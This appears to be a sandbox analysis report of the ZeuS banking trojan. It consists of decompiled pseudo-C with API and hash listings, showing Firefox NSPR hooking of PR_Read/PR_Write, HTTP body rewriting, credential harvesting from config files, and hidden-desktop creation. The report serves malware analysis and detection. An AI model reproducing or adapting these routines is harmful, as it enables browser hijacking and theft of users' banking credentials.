  • Instruction Fuzzy Hash: BF316E35A00118EBDF11ABA4CC819AEBB79EB48354F144237F801FB291C7799E44DBA4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0041C41A(void* __ecx, void* __edx, void* __eflags) {
				long _v8;
				signed int _v12;
				void _v532;
				void* __edi;
				void* __esi;
				unsigned int _t22;
				void* _t30;
				void* _t39;
				void* _t41;
				WCHAR* _t42;
				void* _t43;
				void* _t46;

				_t41 = __edx;
				_t39 = __ecx;
				InitializeCriticalSection(0x4223b8);
				 *0x4223ac = 0;
				 *0x4223b4 = 0;
				 *0x4223b0 = 0;
				 *0x4223a8 = 0;
				 *0x42341c = 0;
				 *0x423414 = 0;
				 *0x423418 = 0;
				InitializeCriticalSection(0x4233fc);
				_t42 =  &_v532;
				E0041CC9C(_t39, _t42, InitializeCriticalSection, 0);
				_v12 = _v12 | 0xffffffff;
				_v8 = 0x1fe;
				_t43 = CreateFileW(_t42, 0x80000000, 1, 0, 3, 0, 0);
				if(_t43 != 0xffffffff) {
					if(ReadFile(_t43,  &_v532, _v8,  &_v8, 0) != 0) {
						_v12 = _v8;
					}
					CloseHandle(_t43);
				}
				_t22 = _v12;
				if(_t22 == 0xffffffff || (_t22 & 0x00000001) != 0) {
					_t22 = 0;
				}
				 *((short*)(_t46 + (_t22 >> 1) * 2 - 0x210)) = 0;
				E00415ED6( &_v532);
				E0040F74E( &_v532);
				 *0x423440 = 0;
				 *0x42345c = 0;
				InitializeCriticalSection(0x423444);
				E0040D74C(_t41);
				if(GetModuleHandleW(L"nspr4.dll") == 0) {
					_t30 = 0;
				} else {
					_t30 = E0040E2A9(0, _t41, _t29);
				}
				if(_t30 != 0) {
					 *0x423888 =  *0x423888 | 0x00000001;
				}
				E0040E072();
				return 1;
			}

APIs
  • InitializeCriticalSection.KERNEL32(004223B8,00000000,74B04EE0,00000000), ref: 0041C431
  • InitializeCriticalSection.KERNEL32(004233FC), ref: 0041C466
    • Part of subcall function 0041CC9C: PathRenameExtensionW.SHLWAPI(?,.dat,?,00423A10,00000032,77E49EB0,?,00000000), ref: 0041CD17
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 0041C48E
  • ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 0041C4AB
  • CloseHandle.KERNEL32(00000000), ref: 0041C4BC
  • InitializeCriticalSection.KERNEL32(00423444), ref: 0041C503
  • GetModuleHandleW.KERNEL32(nspr4.dll), ref: 0041C50F
Strings
Similarity
  • API ID: CriticalInitializeSection$FileHandle$CloseCreateExtensionModulePathReadRename
  • String ID: nspr4.dll
  • API String ID: 1155594396-741017701
  • Opcode ID: 529961c75d4cf5e28373da5eaafee238104501b8dcc043a87652e7ba16f2e976
  • Instruction ID: b425990ff73c83cacce3ae51245a2f6e25341662aad2668db5bcc9506d2b274c
  • Opcode Fuzzy Hash: 529961c75d4cf5e28373da5eaafee238104501b8dcc043a87652e7ba16f2e976
  • Instruction Fuzzy Hash: 2031A071640218BAC720EF79ADC5AEA7BB8BB04314F90057FE414E32A0D7785E868B5C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 83%
			E0040E2A9(void* __ecx, void* __edx, struct HINSTANCE__* __edi) {
				void* __ebx;
				_Unknown_base(*)()* _t4;
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t12;

				_t12 = __edx;
				_t11 = __ecx;
				 *0x422348 = GetProcAddress(__edi, "PR_OpenTCPSocket");
				 *0x422358 = GetProcAddress(__edi, "PR_Close");
				 *0x422368 = GetProcAddress(__edi, "PR_Read");
				_t4 = GetProcAddress(__edi, "PR_Write");
				_push(0x422348);
				_t9 = 4;
				 *0x422378 = _t4;
				_t10 = E0040DFE1(_t9, _t11, _t12);
				if(_t10 != 0) {
					E0040F807(__edi,  *0x422350,  *0x422360,  *0x422370,  *0x422380);
				}
				return _t10;
			}

APIs
  • GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 0040E2B7
  • GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0040E2C4
  • GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0040E2D1
  • GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0040E2DE
    • Part of subcall function 0040DFE1: VirtualAllocEx.KERNEL32(000000FF,00000000,00000034,00003000,00000040,00000000,77E49EB0,?,?,0040E2A7,00422008,00000000,0041C534), ref: 0040E018
    • Part of subcall function 0040F807: InitializeCriticalSection.KERNEL32(004233D4,74B04EE0,0040E317,00422348), ref: 0040F81D
    • Part of subcall function 0040F807: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0040F859
    • Part of subcall function 0040F807: GetProcAddress.KERNEL32(PR_SetError), ref: 0040F86B
    • Part of subcall function 0040F807: GetProcAddress.KERNEL32(PR_GetError), ref: 0040F87D
Strings
Similarity
  • API ID: AddressProc$AllocCriticalInitializeSectionVirtual
  • String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
  • API String ID: 1833644279-3954199073
  • Opcode ID: 3b960e4304a581f6814d9db48bca70c3b943047324b32a7be9f0102f349e523b
  • Instruction ID: 57f34caad2da9e211d8cbbac476d0c24e2f0584a2acf4200671511a8da91c956
  • Opcode Fuzzy Hash: 3b960e4304a581f6814d9db48bca70c3b943047324b32a7be9f0102f349e523b
  • Instruction Fuzzy Hash: C8F09071B90350BACB309F76AD45E667FACB749B503A8007BB800A71F0D2FE4552DA1C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 78%
			E0040FFF6(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed char _v32;
				char _v36;
				char _v40;
				signed int _v44;
				void* _v48;
				signed int _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t99;
				signed int _t100;
				signed int _t101;
				intOrPtr _t103;
				void* _t104;
				signed int _t107;
				signed int _t108;
				signed int _t110;
				intOrPtr _t119;
				void* _t131;
				signed int _t139;
				void* _t149;
				struct _CRITICAL_SECTION* _t153;
				intOrPtr _t155;
				signed int _t168;
				signed int _t174;
				char _t176;
				void* _t177;
				intOrPtr _t179;
				void* _t182;
				signed int _t183;
				intOrPtr _t186;
				void* _t188;
				signed int _t189;
				void* _t191;
				void* _t192;
				void* _t193;

				_t99 = E0041CAA4();
				_t179 = _a4;
				if(_t99 == 0 || _a8 == 0 || _a12 <= 0) {
					L40:
					_t100 =  *0x4233f8(_t179, _a8, _a12);
					goto L41;
				} else {
					_t153 = 0x4233d4;
					EnterCriticalSection(0x4233d4);
					_t101 = E0040F394(_t179);
					if(_t101 == 0xffffffff) {
						L39:
						LeaveCriticalSection(_t153);
						goto L40;
					}
					_t103 = _t101 * 0x38 +  *0x4233f0;
					if( *((intOrPtr*)(_t103 + 0x30)) > 0) {
						L32:
						_t182 =  *((intOrPtr*)(_t103 + 0x30)) -  *((intOrPtr*)(_t103 + 0x34));
						_t85 = _t103 + 0x2c; // -4338628
						_t173 = _t85;
						__eflags = _a12 - _t182;
						_t183 =  <  ? _a12 : _t182;
						_t104 = E00405222(_a8,  *_t85 +  *((intOrPtr*)(_t103 + 0x34)), _t183);
						 *((intOrPtr*)(_t104 + 0x34)) =  *((intOrPtr*)(_t104 + 0x34)) + _t183;
						__eflags =  *((intOrPtr*)(_t104 + 0x34)) -  *((intOrPtr*)(_t104 + 0x30));
						if( *((intOrPtr*)(_t104 + 0x34)) ==  *((intOrPtr*)(_t104 + 0x30))) {
							E00405299(E004051E6( *_t173), _t173, 0, 0xc);
						}
						LeaveCriticalSection(_t153);
						_t100 = _t183;
						L41:
						return _t100;
					}
					if( *((intOrPtr*)(_t103 + 0x10)) <= 0) {
						goto L39;
					}
					LeaveCriticalSection(0x4233d4);
					_t107 =  *0x4233f8(_t179, _a8, _a12);
					_v52 = _t107;
					if(_t107 <= 0xffffffff) {
						L38:
						_t100 = _v52;
						goto L41;
					}
					EnterCriticalSection(0x4233d4);
					_t108 = E0040F394(_t179);
					_t174 = _t108;
					if(_t174 == 0xffffffff) {
						L35:
						_push(8);
						_push(0xffffe890);
						L36:
						 *0x4233d0();
						_v52 = _v52 | 0xffffffff;
						L37:
						LeaveCriticalSection(_t153);
						goto L38;
					}
					_t168 = _v52;
					if(_t168 == 0) {
						L11:
						_t176 = _t174 * 0x38 +  *0x4233f0;
						_v36 = _t176;
						if(_t168 > 0) {
							E00405222( *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t176 + 0x18)), _a8, _t168);
							 *((intOrPtr*)(_t176 + 0x18)) =  *((intOrPtr*)(_t176 + 0x18)) + _t168;
						}
						_t110 = E0040FC1A(_t156,  &_v20,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t176 + 0x18)));
						_v52 = _t110;
						if(_t110 == 1) {
							_t119 = E0040FDC4( &_v20,  *((intOrPtr*)(_t176 + 0x18)),  *((intOrPtr*)(_t176 + 0x14)), ( &_v48 & 0xffffff00 | _v52 == 0x00000000) & 0x000000ff,  &_v48,  &_v40);
							_v60 = _t119;
							if(_t119 == 1) {
								if(E00412174( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)),  *((intOrPtr*)(_t176 + 4)),  &_v48,  &_v40) != 0) {
									_t155 = _v40;
									_t186 = E004051B6( *((intOrPtr*)(_t176 + 0x18)) - _v8 + _v12 + _t155 + 0x14);
									_v40 = _t186;
									if(_t186 != 0) {
										_t131 = E00405222(_t186,  *((intOrPtr*)(_t176 + 0x14)), _v12);
										_push(_t155);
										if((_v32 & 0x00000002) == 0) {
											E0040598F( &_v32);
											_t188 = E0040A190(_t186, _v16, "Content-Length",  &_v36) + _v60;
											E00405222(_t188, _v68, _t155);
											_t189 = _t188 + _t155;
											__eflags = _t189;
										} else {
											_push("%x\r\n");
											_t191 = _t186 + _t131;
											_t177 = 0xd;
											_t192 = _t191 + E00405F1D(_t131, _t177, _t191);
											E00405222(_t192, _v48, _t155);
											_t193 = _t192 + _t155;
											E00405222(_t193, "\r\n0\r\n\r\n", 7);
											_t176 = _v60;
											_t189 = _t193 + 7;
										}
										_t137 =  *((intOrPtr*)(_t176 + 0x18));
										if(_v8 !=  *((intOrPtr*)(_t176 + 0x18))) {
											_t189 = _t189 + E00405222(_t189,  *((intOrPtr*)(_t176 + 0x14)) + _v8, _t137 - _v8);
										}
										E004051E6( *((intOrPtr*)(_t176 + 0x14)));
										_t139 = _v44;
										 *((intOrPtr*)(_t176 + 0x14)) = _t139;
										 *((intOrPtr*)(_t176 + 0x18)) = _t189 - _t139;
									}
								}
								_v44 = _v44 | 0xffffffff;
								E004051E6(_v48);
							}
							_t153 = 0x4233d4;
						}
						if(_v52 <= 0) {
							L29:
							if(__eflags == 0) {
								L31:
								 *((intOrPtr*)(_t176 + 0x2c)) =  *((intOrPtr*)(_t176 + 0x14));
								 *((intOrPtr*)(_t176 + 0x30)) =  *((intOrPtr*)(_t176 + 0x18));
								 *((intOrPtr*)(_t176 + 0x34)) = 0;
								 *((intOrPtr*)(_t176 + 0x14)) = 0;
								 *((intOrPtr*)(_t176 + 0x18)) = 0;
								E00412692( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)));
								_t103 = _v40;
								 *((intOrPtr*)(_t176 + 0x10)) = 0;
								 *((intOrPtr*)(_t176 + 0xc)) = 0;
								goto L32;
							}
							__eflags = _v44 - 0xffffffff;
							if(_v44 != 0xffffffff) {
								goto L37;
							}
							goto L31;
						} else {
							if(_v44 != 0) {
								__eflags = _v52;
								goto L29;
							}
							_push(0);
							_push(0xffffe892);
							goto L36;
						}
					}
					_t149 = _t108 * 0x38 +  *0x4233f0;
					_t156 =  *((intOrPtr*)(_t149 + 0x18)) + _t168;
					_t11 = _t149 + 0x14; // -4338652
					if(E00405171( *((intOrPtr*)(_t149 + 0x18)) + _t168, _t11) == 0) {
						goto L35;
					}
					_t168 = _v52;
					goto L11;
				}
			}

APIs
    • Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC
  • EnterCriticalSection.KERNEL32(004233D4), ref: 00410032
  • LeaveCriticalSection.KERNEL32(004233D4), ref: 00410060
  • EnterCriticalSection.KERNEL32(004233D4), ref: 00410084
  • LeaveCriticalSection.KERNEL32(004233D4,00000000,?,00000000), ref: 004102C7
  • LeaveCriticalSection.KERNEL32(004233D4), ref: 004102E6
    • Part of subcall function 0040A190: StrCmpNIA.SHLWAPI(?,?,?,?,?), ref: 0040A1EA
    • Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9
  • LeaveCriticalSection.KERNEL32(004233D4), ref: 004102F3
Strings
Similarity
  • API ID: CriticalSection$Leave$Enter$FreeHeapObjectSingleWait
  • String ID: 0$%x$Content-Length
  • API String ID: 4067213518-3838797520
  • Opcode ID: 76b2d39803747284f8b163e729dfe8b5ea9688545f962bab8c0144a1bfd70fd9
  • Instruction ID: 93d363655daae37b504d58c5fa885ba3b644f58f0cb4df55ecefe330d9afab3c
  • Opcode Fuzzy Hash: 76b2d39803747284f8b163e729dfe8b5ea9688545f962bab8c0144a1bfd70fd9
  • Instruction Fuzzy Hash: CD91BD72504612AFCB10DF24D84599ABBB4FF84314F000A6EF850A72A1D778EA95CFDA
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 79%
			E0041415B(char* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char* _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v64;
				char _v84;
				char _v108;
				char _v152;
				char _v180;
				char _v252;
				short _v766;
				char _v772;
				short _v1292;
				void* __edi;
				void* __esi;
				void* _t46;
				void* _t48;
				void* _t53;
				void* _t57;
				void* _t59;
				void* _t61;
				void* _t68;
				void* _t70;
				void* _t75;
				WCHAR* _t100;
				signed int _t101;
				WCHAR* _t103;
				char* _t108;
				intOrPtr _t109;
				void* _t112;
				intOrPtr _t125;

				_t99 = __edx;
				_t98 = __ecx;
				E00405299( &_v12,  &_v12, 0, 8);
				_t46 = 0x6a;
				E0040F34A(_t46,  &_v252);
				_t48 = 0x6b;
				E0040F34A(_t48,  &_v108);
				_t100 =  &_v772;
				_t53 = E0040930A(0x80000001, _t98, _t100,  &_v252,  &_v108, 0x104);
				if(_t53 != 0xffffffff) {
					_t115 = _t53;
					if(_t53 != 0) {
						ExpandEnvironmentStringsW(_t100,  &_v1292, 0x104);
						E00413F6F(_t99, _t115,  &_v1292,  &_v12);
						PathRemoveFileSpecW( &_v1292);
					}
				}
				_t101 = 0;
				if(_v8 != 0) {
					L14:
					_t125 = _v8;
					goto L15;
				} else {
					_t57 = 0x6d;
					E0040F34A(_t57,  &_v64);
					_t59 = 0x6e;
					E0040F34A(_t59,  &_v152);
					_t108 =  &_v84;
					_t61 = 0x6f;
					E0040F34A(_t61, _t108);
					_v24 =  &_v64;
					_v20 =  &_v152;
					_v40 = 0x24;
					_v36 = 0x1a;
					_v32 = 0x26;
					_v28 = 0x23;
					_v16 = _t108;
					do {
						_t109 =  *((intOrPtr*)(_t112 + _t101 * 4 - 0x24));
						__imp__SHGetFolderPathW(0, _t109, 0, 0,  &_v772);
						if(0 == 0) {
							_t118 = _t109 - 0x24;
							if(_t109 == 0x24) {
								E00413F2D(_t118,  &_v772,  &_v12, 0);
								_v766 = 0;
							}
							_t99 =  &_v24;
							_t98 =  &_v772;
							E0040A91B( &_v772,  &_v24, 0, 3, 2, E00414112,  &_v12, 0, 0, 0);
						}
						_t101 = _t101 + 1;
					} while (_t101 < 4);
					if(_v8 != 0) {
						L15:
						if(_t125 <= 0) {
							return E004051E6(_v12);
						}
						_push(0xcb);
						return E0041293E(_t99, _v12, 0x70);
					}
					_t68 = 0x6a;
					E0040F34A(_t68,  &_v180);
					_t70 = 0x6c;
					E0040F34A(_t70,  &_v64);
					_t103 =  &_v772;
					_t75 = E0040930A(0x80000001, _t98, _t103,  &_v180,  &_v64, 0x104);
					if(_t75 != 0xffffffff) {
						_t124 = _t75;
						if(_t75 != 0) {
							ExpandEnvironmentStringsW(_t103,  &_v1292, 0x104);
							E00413F2D(_t124,  &_v1292,  &_v12, 1);
						}
					}
					goto L14;
				}
			}

APIs
    • Part of subcall function 0040930A: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041C0F5,?,?,00000104,.exe,00000000), ref: 0040931F
  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 004141C1
    • Part of subcall function 00413F6F: GetPrivateProfileStringW.KERNEL32 ref: 00413FA6
    • Part of subcall function 00413F6F: StrStrIW.SHLWAPI(?,?), ref: 0041402E
    • Part of subcall function 00413F6F: StrStrIW.SHLWAPI(?,?), ref: 0041403F
    • Part of subcall function 00413F6F: GetPrivateProfileStringW.KERNEL32 ref: 0041405B
    • Part of subcall function 00413F6F: GetPrivateProfileStringW.KERNEL32 ref: 00414079
  • PathRemoveFileSpecW.SHLWAPI(?), ref: 004141DE
    • Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9
  • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,?,00000104,?,00000000,00000008), ref: 00414254
  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104), ref: 004142F1
Strings
Similarity
  • API ID: PrivateProfileString$EnvironmentExpandPathStrings$FileFolderFreeHeapOpenRemoveSpec
  • String ID: #$$$&
  • API String ID: 1517737059-1941049543
  • Opcode ID: df6cb5c6da72b1241ae51dc1d824498f3738ef8515b478fd251b57d9802989d7
  • Instruction ID: fb74a93b5cbbf33ea3f2ca381c5579b68f429936b0253ecff0b666a04714469c
  • Opcode Fuzzy Hash: df6cb5c6da72b1241ae51dc1d824498f3738ef8515b478fd251b57d9802989d7
  • Instruction Fuzzy Hash: 4F515E76E40218AADF20DBA1DC49FDF77BCAB48314F0005A7BA05F7181D778AB858B55
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040F807(struct HINSTANCE__* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t14;

				 *0x4233f0 =  *0x4233f0 & 0x00000000;
				 *0x4233f4 =  *0x4233f4 & 0x00000000;
				_t14 = __eax;
				InitializeCriticalSection(0x4233d4);
				 *0x4233ec = _a4;
				 *0x4233c8 = _a8;
				 *0x4233f8 = _a12;
				 *0x4233cc = _t14;
				 *0x4233c4 = _a16;
				 *0x423234 = GetProcAddress(_t14, "PR_GetNameForIdentity");
				 *0x4233d0 = GetProcAddress( *0x4233cc, "PR_SetError");
				_t12 = GetProcAddress( *0x4233cc, "PR_GetError");
				 *0x4231cc = _t12;
				return _t12;
			}

APIs
  • InitializeCriticalSection.KERNEL32(004233D4,74B04EE0,0040E317,00422348), ref: 0040F81D
  • GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0040F859
  • GetProcAddress.KERNEL32(PR_SetError), ref: 0040F86B
  • GetProcAddress.KERNEL32(PR_GetError), ref: 0040F87D
Strings
Similarity
  • API ID: AddressProc$CriticalInitializeSection
  • String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
  • API String ID: 2804437462-2578621715
  • Opcode ID: 19bfad70c24a588a5416628e1a211597a686679750d791b598d676707ff293f6
  • Instruction ID: c9e13c538d10998c415214bd94c901d369d560a9c15a2a6aa7c215be741372ea
  • Opcode Fuzzy Hash: 19bfad70c24a588a5416628e1a211597a686679750d791b598d676707ff293f6
  • Instruction Fuzzy Hash: 8F018475B053559BC720DF65EC45A057BF0FB48B62B90483AE814932A0DBB89612CF48
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 77%
			E0041967B(void* __edx, intOrPtr* _a4) {
				char _v524;
				char _v544;
				char _v556;
				intOrPtr _v572;
				char _v924;
				char _v1028;
				char _v1040;
				char _v1060;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1120;
				char* _v1124;
				intOrPtr _v1128;
				char _v1132;
				intOrPtr _v1144;
				signed short _v1146;
				char _v1148;
				signed int _v1152;
				signed int _v1156;
				char _v1157;
				signed int _v1160;
				void* _v1164;
				void* _v1168;
				char _v1177;
				char _v1180;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t59;
				void* _t62;
				signed int _t71;
				char _t77;
				char* _t85;
				char _t88;
				char _t95;
				short _t100;
				intOrPtr* _t105;
				void* _t111;
				char _t112;
				signed int _t118;
				signed int _t119;
				void* _t123;

				_t111 = __edx;
				_t105 = _a4;
				_t59 =  *(_t105 + 4);
				_push(_t118);
				_t119 = _t118 | 0xffffffff;
				_v1152 = _t119;
				_v1156 = _t119;
				if(_t59 == _t119 || _t59 == 0xfffffffe) {
					L4:
					_t62 = E00405865( *((intOrPtr*)( *_t105 + 8)), _t108, 0);
					_t109 =  *_t105;
					_t63 = E0040826F(_t62,  *_t105,  *((intOrPtr*)( *_t105 + 4)));
					_v1160 = _t63;
					_t133 = _t63 - _t119;
					if(_t63 == _t119) {
						goto L20;
					}
					E004085E1(_t109, _t63);
					E0040859F(_v1160);
					_push(_t105 + 8);
					_push(3);
					_push(_v1164);
					_t123 = 4;
					if(E0040B88A(_t109, _t123, _t133) == 0) {
						goto L20;
					}
					_t71 =  *(_t105 + 4);
					if(_t71 == 0xfffffffe) {
						SetThreadPriority(GetCurrentThread(), 1);
						E0041C946(0x2937498d,  &_v1028, 0);
						_t63 = E0040B9A6(_t109, __eflags,  &_v1040);
						__eflags = _t63;
						if(_t63 == 0) {
							goto L20;
						}
						_t77 = E0040D35A(_t109, _t111,  &_v924, 1);
						__eflags = _t77;
						if(_t77 == 0) {
							L19:
							_t63 = E0040D5C5( &_v924, 1);
							goto L20;
						} else {
							__imp__GetShellWindow();
							__eflags = _t77;
							_v1157 = _t77 != 0;
							__eflags = _v1157;
							if(_v1157 == 0) {
								E0040F34A(0xa8,  &_v1132);
								_t85 =  &_v524;
								__imp__SHGetFolderPathW(0, 0x25, 0, 0, _t85);
								__eflags = _t85;
								if(_t85 == 0) {
									_t88 = E0040AA77( &_v1132,  &_v544,  &_v544);
									__eflags = _t88;
									if(_t88 != 0) {
										_t112 = 0x44;
										E00405299( &_v1120,  &_v1120, 0, _t112);
										_v1124 =  &_v1060;
										_v1132 = _t112;
										_t95 = E00406AAD( &_v556, 0, 0,  &_v1132,  &_v1180);
										__eflags = _t95;
										if(_t95 != 0) {
											WaitForSingleObject(_v1168, 0x1388);
											CloseHandle(_v1164);
											CloseHandle(_v1168);
											_v1177 = 1;
										}
									}
								}
							}
							SystemParametersInfoW(0x1003, 0, 0, 0);
							__eflags = _v1157 - 1;
							if(__eflags == 0) {
								_v1132 =  &_v924;
								_v1128 = 0x40d7cf;
								_v1124 = 0x40d7d2;
								_v1120 = E0040D7D5;
								_v1116 = E0040D7F9;
								_v1112 = E0040D840;
								_v1108 = E0040D875;
								_v1104 = 0x40d7cf;
								E0041B567(__eflags, _v1156,  &_v1132, _v924, _v572);
							}
							goto L19;
						}
					} else {
						if(_t71 == 0xffffffff) {
							_t63 = E0041131B(_v1156, _t109);
						} else {
							_push(_v1152);
							_t63 = E004083E2(_v1156);
							_t105 = _a4;
						}
						goto L20;
					}
				} else {
					_t100 = 2;
					_v1148 = _t100;
					_t108 =  *(_t105 + 4) << 8;
					_v1146 =  *(_t105 + 5) & 0x000000ff |  *(_t105 + 4) << 0x00000008;
					_v1144 = 0x100007f;
					_t63 = E0040822E( &_v1148);
					_v1152 = _t63;
					if(_t63 == _t119) {
						L20:
						E00408589(E00408589(_t63, _v1156), _v1152);
						E004051E6(_t105);
						return 0;
					} else {
						E004085E1(_t108, _t63);
						goto L4;
					}
				}
			}


APIs
    • Part of subcall function 0040822E: socket.WS2_32(?,00000001,00000006), ref: 00408237
    • Part of subcall function 0040822E: connect.WS2_32(00000000,?,-0000001D), ref: 00408257
    • Part of subcall function 0040822E: closesocket.WS2_32(00000000), ref: 00408262
    • Part of subcall function 004085E1: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 004085F7
  • GetCurrentThread.KERNEL32 ref: 00419760
  • SetThreadPriority.KERNEL32(00000000), ref: 00419767
    • Part of subcall function 0040B9A6: OpenWindowStationW.USER32 ref: 0040B9CB
    • Part of subcall function 0040B9A6: CreateWindowStationW.USER32 ref: 0040B9DE
    • Part of subcall function 0040B9A6: GetProcessWindowStation.USER32 ref: 0040B9EF
    • Part of subcall function 0040B9A6: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0040BA2A
    • Part of subcall function 0040B9A6: CreateDesktopW.USER32 ref: 0040BA3E
    • Part of subcall function 0040B9A6: GetCurrentThreadId.KERNEL32 ref: 0040BA4A
    • Part of subcall function 0040B9A6: GetThreadDesktop.USER32(00000000), ref: 0040BA51
    • Part of subcall function 0040B9A6: SetThreadDesktop.USER32(00000000,00000000,00000000), ref: 0040BA63
    • Part of subcall function 0040B9A6: CloseDesktop.USER32(00000000,00000000,00000000), ref: 0040BA75
    • Part of subcall function 0040B9A6: CloseWindowStation.USER32(?,?), ref: 0040BA90
    • Part of subcall function 0040D35A: TlsAlloc.KERNEL32(00423238,00000000,0000018C,00000000,00000000), ref: 0040D373
  • GetShellWindow.USER32 ref: 004197AD
  • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?), ref: 004197E0
    • Part of subcall function 0040AA77: PathCombineW.SHLWAPI(0041C3C7,0041C3C7,?,0041C3C7,?,?), ref: 0040AA96
  • WaitForSingleObject.KERNEL32(00000000,00001388,?,00000000,00000000,?,00000044,?,00000000,00000044,?,?), ref: 00419842
  • CloseHandle.KERNEL32(?), ref: 00419852
  • CloseHandle.KERNEL32(?), ref: 00419858
  • SystemParametersInfoW.USER32 ref: 00419867
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: DesktopThreadWindow$CloseStation$CreateCurrentHandleOpenPath$AllocCombineFolderInfoObjectParametersPriorityProcessShellSingleSystemWaitclosesocketconnectsetsockoptsocket
  • String ID:
  • API String ID: 1240616959-0
  • Opcode ID: b2780c045a755fe3b80d6ec365fe3fee6ba3936687b969d175e0075cc8536d3c
  • Instruction ID: f83c0a9bf5d7524663b60e026974cb35d1458058d7e13ec234b926d5c24605e1
  • Opcode Fuzzy Hash: b2780c045a755fe3b80d6ec365fe3fee6ba3936687b969d175e0075cc8536d3c
  • Instruction Fuzzy Hash: 45619071508341AFD720EF61CD44A9FBBE8AF85704F04492EF994A72A1D778D848CB5A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 82%
			E0040CDA7(void* __ecx, void* __eflags) {
				intOrPtr _v74;
				signed int _v78;
				char _v124;
				char _v128;
				intOrPtr _v140;
				void* _v144;
				intOrPtr _v148;
				void* _v152;
				void* _v156;
				void* _v160;
				char _v164;
				void* _v168;
				signed int _v172;
				long _v184;
				void* __esi;
				void* _t47;
				void* _t49;
				void* _t56;
				void* _t57;
				long _t59;
				intOrPtr _t64;
				long _t65;
				void* _t72;
				signed int _t83;
				intOrPtr* _t85;
				signed int _t94;
				long _t97;
				signed int _t98;
				void* _t100;

				_t100 = (_t98 & 0xfffffff8) - 0xac;
				_t83 = 2;
				_t47 = E0041C97E(__ecx, 0x743c152e, _t83);
				_v156 = _t47;
				if(_t47 != 0) {
					if(E0041CAA4() == 0) {
						L26:
						E004089B9(_v148);
						_t49 = 0;
						L27:
						return _t49;
					}
					E0041D56B(__ecx,  &_v124);
					_t87 = _v78;
					_t94 = E0040CC52( &_v160, _v78,  &_v168) & 0x0000ffff;
					if(_t94 != 0) {
						L7:
						if(_t94 != _v74) {
							E0041D626( &_v124);
							_v78 = _t94;
							E0041D67E( &_v128);
						}
						_v144 =  *0x423e74;
						_t56 = _v152;
						_v172 = 1;
						if(_t56 != 0) {
							_v140 = _t56;
							_v172 = _t83;
						}
						_t57 = _v160;
						if(_t57 != 0) {
							_t87 = _v172;
							_v172 = _v172 + 1;
							 *((intOrPtr*)(_t100 + 0x2c + _v172 * 4)) = _t57;
						}
						_t59 = WaitForMultipleObjects(_v172,  &_v144, 0, 0xffffffff);
						if(_t59 <= 0) {
							L25:
							E00408589(_t59, _v156);
							E00408589(CloseHandle(_v152), _v164);
							CloseHandle(_v160);
							goto L26;
						} else {
							_t85 = __imp__#1;
							while(_t59 < _v172) {
								_t64 =  *((intOrPtr*)(_t100 + 0x2c + _t59 * 4));
								if(_t64 != _v152) {
									if(_t64 != _v160) {
										while(1) {
											L23:
											_t65 =  *_t85(_v168, 0, 0);
											_t97 = _t65;
											if(_t97 == 0xffffffff) {
												break;
											}
											__imp__WSAEventSelect(_t97, 0, 0);
											_v156 = 0;
											__imp__WSAIoctl(_t97, 0x8004667e,  &_v156, 4, 0, 0,  &_v152, 0, 0);
